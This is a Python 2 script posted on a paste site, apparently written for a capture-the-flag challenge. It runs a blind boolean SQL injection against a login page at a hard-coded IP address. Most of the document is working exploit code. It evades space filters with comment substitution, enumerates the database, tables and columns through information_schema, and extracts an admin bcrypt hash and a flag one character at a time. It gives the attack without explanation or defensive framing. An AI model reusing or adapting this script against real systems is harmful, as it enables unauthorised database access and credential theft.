Yam Code
Sign up
Login
New paste
Home
Trending
Archive
English
English
Tiếng Việt
भारत
Sign up
Login
New Paste
Browse
#! /usr/bin/env python2 import requests as req, string, re, commands db_len = 7 # db_name = 'loginv3' db_name = '' admin_password_len = 60 table_in_db = 3 table_name_len_1 = 4 table_name_len_2 = 5 table_name = 'fl4g' columns_in_table = 5 col_1_len = 2 col_2_len = 4 col_3_len = 8 col_4_len = 8 col_5_len = 4 col_1 = 'flag' col_2 = 'name' col_3 = 'username' col_4 = 'password' col_5 = 'admin' total_rows = 1 # :| id = '1' name = 'admin' username = 'admin' password = '$2y$10$KpEcR/n54ZlX1OeKiLKwY.AfWXSXjUzL.Fk0CVtzsfYpYizThN3Qq' admin = '1' custom_string_printable = [ord(i) for i in string.printable] class pass_empty(object): pass def encode_payload_with_space(payload): if ' ' in payload: payload = payload.replace(' ', '/**/') return payload def send_dirty_payload(payload): resp = req.post('http://45.77.241.3/Loginv3/login.php', data={'username': '\\', 'pass': encode_payload_with_space(payload)}).content return resp def len_with_expression(list): length = [] i = 1 for k, v in enumerate(list): v = str(v) if '0' in v: if re.findall(r'^\d{3}$', v): if '10' in str(i): length.append('{} + {}'.format(99, '9 + 1')) else: length.append('{} + {}'.format(99, i)) i += 1 else: length.append('{} - 1'.format(str(int(v) + 1))) continue length.append(v) return length """ Check db length """ # for k, v in enumerate(len_with_expression(xrange(100))): # payload = 'or length(database())={}#'.format(v) # if 'logged user' in send_dirty_payload(payload): # print k, 'logged user' # print '{}\ndb len: {}'.format('-' * 20, k) # break # print k, 'incorrect' """ Get db name """ # for i in xrange(1, db_len + 1): # for k, v in enumerate(len_with_expression(custom_string_printable)): # payload = 'or ascii(mid(database(),{},1))={}#'.format(i, v) # if 'logged user' in send_dirty_payload(payload): # db_name += chr(eval(v)) # print chr(eval(v)), 'logged user' # print '{}\ndb name: {}'.format('-' * 20, db_name) # break # # print payload # print chr(eval(v)), 'incorrect' """ Check admin's password length """ # for k, v in enumerate(len_with_expression(xrange(100))): # payload = 'or length((select password from users limit 1))={}#'.format(v) # if 'logged user' in send_dirty_payload(payload): # print k, 'logged user' # print '{}\nadmin\'s password len: {}'.format('-' * 20, k) # break # print k, 'incorrect' """ Get admin's password """ # list_admin_password_len = [i for i in xrange(1, admin_password_len + 1)] # for i in len_with_expression(list_admin_password_len): # for k, v in enumerate(len_with_expression(custom_string_printable)): # payload = 'or ascii(mid((select password from users limit 1),{},1))={}#'.format(i, v) # if 'User exist' in send_dirty_payload(payload): # db_name += chr(eval(v)) # print chr(eval(v)), send_dirty_payload(payload) # print '{}\nadmin\'s password: {}'.format('-' * 20, db_name) # break # # print payload # print v, chr(eval(v)), send_dirty_payload(payload) """ Count tables in db 'ctf' """ # for k, v in enumerate(len_with_expression(xrange(100))): # payload = 'or (select count(table_name) from information_schema.tables where table_schema=database())={}#'.format(v) # if 'logged user' in send_dirty_payload(payload): # print k, 'logged user' # print '{}\ntotal tables in \'ctf\': {}'.format('-' * 20, k) # break # print k, 'incorrect' """ Check table_name's length """ # for k, v in enumerate(len_with_expression(xrange(100))): # payload = 'or length((select table_name from information_schema.tables where table_schema=database() limit 1,1))={}#'.format( # v) # if 'logged user' in send_dirty_payload(payload): # print k, 'logged user' # print '{}\ntable_name\'s length: {}'.format('-' * 20, k) # break # # print payload # print k, 'incorrect' """ List table in db 'ctf' (fix) # """ # list_table_name_1_len = [i for i in xrange(1, table_name_len_1 + 1)] # for i in len_with_expression(list_table_name_1_len): # for k, v in enumerate(len_with_expression(custom_string_printable)): # payload = 'or ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 1),{},1))={}#'.format( # i, v) # if 'logged user' in send_dirty_payload(payload): # db_name += chr(eval(v)) # print chr(eval(v)), 'logged user' # print '{}\ntable_name: {}'.format('-' * 20, db_name) # break # # print payload # print chr(eval(v)), 'incorrect' """ Count columns in db 'ctf' """ # for k, v in enumerate(len_with_expression(xrange(1, 100))): # payload = 'or (select count(column_name) from information_schema.columns where table_schema=database() limit 1)={}#'.format( # v) # if 'logged user' in send_dirty_payload(payload): # print v, 'logged user' # print '{}\ntotal tables in \'ctf\': {}'.format('-' * 20, v) # break # print v, 'incorrect' """ Check column_name's length """ # list_columns_in_table = [i for i in xrange(1, table_name_len_1)] # for k, v in enumerate(len_with_expression(xrange(1, 100 + 1))): # payload = 'or length((select * from (select column_name from information_schema.columns where table_schema=database() limit 1)x limit 1))={}#'.format( # v) # if 'logged user' in send_dirty_payload(payload): # print v, 'logged user' # print '{}\ncolumn {}\'s name length: {}'.format('-' * 20, k, v) # break # print v, 'incorrect' # for i in len_with_expression(list_columns_in_table): # for k, v in enumerate(len_with_expression(xrange(1, 100 + 1))): # payload = 'or length((select column_name from information_schema.columns where table_schema=database() limit {},1))={}#'.format( # i, v) # if 'User exist' in send_dirty_payload(payload): # print v, 'logged user' # print '{}\ncolumn {}\'s name length: {}'.format('-' * 20, int(i) + 1, v) # break # # print payload # print v, 'incorrect' """ Get col name """ # for i in xrange(1, 100 + 1): # for k, v in enumerate(len_with_expression(custom_string_printable)): # payload = 'or ascii(mid((select column_name from information_schema.columns where table_schema=database() limit 1,1),{},1))={}#'.format( # i, v) # if 'logged user' in send_dirty_payload(payload): # db_name += chr(eval(v)) # print chr(eval(v)), 'logged user' # print '{}\ncol name: {}'.format('-' * 20, db_name) # break # # print payload # print chr(eval(v)), 'incorrect' """ Count id rows """ # for k, v in enumerate(len_with_expression(xrange(1, 101))): # payload = 'or (select count(pass) from fl4g)={}#'.format( # v) # if 'logged user' in send_dirty_payload(payload): # print v, 'logged user' # print '{}\ntotal rows in \'users\': {}'.format('-' * 20, v) # break # print v, 'incorrect' """ Dump 1 row :| """ for i in xrange(2640, 2700): # position() mysql for k, v in enumerate(len_with_expression(custom_string_printable)): payload = 'or ascii(mid((select flag from fl4g),{},1))={}#'.format( i, v) if 'logged user' in send_dirty_payload(payload): db_name += chr(eval(v)) print chr(eval(v)), 'logged user' print '{}\nflag: {}'.format('-' * 20, db_name) break # print payload print chr(eval(v)), 'incorrect' """ dbg """ # for k, v in enumerate(len_with_expression(custom_string_printable)): # print v, eval(v) # test = [i for i in xrange(1, admin_password_len + 1)] # print len_with_expression(test)
Paste Settings
Paste Title :
[Optional]
Paste Folder :
[Optional]
Select
Syntax Highlighting :
[Optional]
Select
Markup
CSS
JavaScript
Bash
C
C#
C++
Java
JSON
Lua
Plaintext
C-like
ABAP
ActionScript
Ada
Apache Configuration
APL
AppleScript
Arduino
ARFF
AsciiDoc
6502 Assembly
ASP.NET (C#)
AutoHotKey
AutoIt
Basic
Batch
Bison
Brainfuck
Bro
CoffeeScript
Clojure
Crystal
Content-Security-Policy
CSS Extras
D
Dart
Diff
Django/Jinja2
Docker
Eiffel
Elixir
Elm
ERB
Erlang
F#
Flow
Fortran
GEDCOM
Gherkin
Git
GLSL
GameMaker Language
Go
GraphQL
Groovy
Haml
Handlebars
Haskell
Haxe
HTTP
HTTP Public-Key-Pins
HTTP Strict-Transport-Security
IchigoJam
Icon
Inform 7
INI
IO
J
Jolie
Julia
Keyman
Kotlin
LaTeX
Less
Liquid
Lisp
LiveScript
LOLCODE
Makefile
Markdown
Markup templating
MATLAB
MEL
Mizar
Monkey
N4JS
NASM
nginx
Nim
Nix
NSIS
Objective-C
OCaml
OpenCL
Oz
PARI/GP
Parser
Pascal
Perl
PHP
PHP Extras
PL/SQL
PowerShell
Processing
Prolog
.properties
Protocol Buffers
Pug
Puppet
Pure
Python
Q (kdb+ database)
Qore
R
React JSX
React TSX
Ren'py
Reason
reST (reStructuredText)
Rip
Roboconf
Ruby
Rust
SAS
Sass (Sass)
Sass (Scss)
Scala
Scheme
Smalltalk
Smarty
SQL
Soy (Closure Template)
Stylus
Swift
TAP
Tcl
Textile
Template Toolkit 2
Twig
TypeScript
VB.Net
Velocity
Verilog
VHDL
vim
Visual Basic
WebAssembly
Wiki markup
Xeora
Xojo (REALbasic)
XQuery
YAML
HTML
Paste Expiration :
[Optional]
Never
Self Destroy
10 Minutes
1 Hour
1 Day
1 Week
2 Weeks
1 Month
6 Months
1 Year
Paste Status :
[Optional]
Public
Unlisted
Private (members only)
Password :
[Optional]
Description:
[Optional]
Tags:
[Optional]
Encrypt Paste
(
?
)
Create New Paste
You are currently not logged in, this means you can not edit or delete anything you paste.
Sign Up
or
Login
Site Languages
×
English
Tiếng Việt
भारत